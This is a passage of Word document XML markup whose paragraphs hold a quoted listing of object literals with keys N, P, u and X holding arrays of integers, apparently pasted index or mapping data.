    <w:p w14:paraId="70EAD8CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [15, 8, 3, 9, 24, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C771B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C23507" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 22, 53, 131, 159, 197, 265, 297, 311, 317, 351, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C792EE0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10081F58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A72FE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E4E4CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 11, 12, 35, 62, 149, 238, 322, 333, 353]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A049B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF8561" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 11, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ACA744" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99AB0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143F947" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BECD78" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD42AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 5, 6, 11, 12, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5389CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 4, 7, 8, 9, 10, 13, 14, 29, 33, 34, 35, 76, 123, 159, 196, 287, 291, 295]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA6060" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B03A17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB13789" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC3892" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3902FC8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F79F3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16391D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A0593" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 5, 269]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D48B95" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB88EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 1, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0D5F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD7E30" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [69, 85]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613EAAE9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2FA4AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD809B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB622D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 5, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81FDBC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF007A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961D93F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8286C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493653E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FC33A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 8, 3, 2, 4, 7, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1181C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ABA25A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A803D5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE537A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495487C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0A9CBA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B8A0C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BDF94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CF5ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649351AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B125C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610210AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27462267" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A28F53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F614F0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73226EC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B00A5F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB5D94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71CBBD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1C463" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF7E2AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C00972" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C374B42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 5, 6, 8, 35, 333]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EEB95" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB08D58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 8, 3, 4, 7, 6, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B371E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE650C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA74D76" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63536202" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3E522" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA0D3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AA65D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D2961" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F96826" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781D4195" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1569F1C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6D5ADA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4324D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8A55D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341CE483" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537735A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34, 44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F522D20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E99D5DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EADF2FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52500291" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 29]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F5E06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46F4DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C45E1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4981BE27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168A9EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B8EB5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AEBD00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52957D98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 50, 223]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C000CD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F90E56" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7D39B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DBD65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707AE98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1F46E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CAF96E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF9FCA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1831F661" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5B397" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E878537" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E7542" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 14, 16, 18]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B53C92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E16D7A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731C340" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C5799" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [4, 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69597141" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275AC14D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB67605" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA8FDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCDAFEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3228A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0E33E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120ABCEF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FED698" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B60C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CB126" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64C624" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B12038E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F4C6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3FCBE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC3C443" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D23DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C65DA48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73E5CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43EE05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F1C19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 280]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B59C3C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
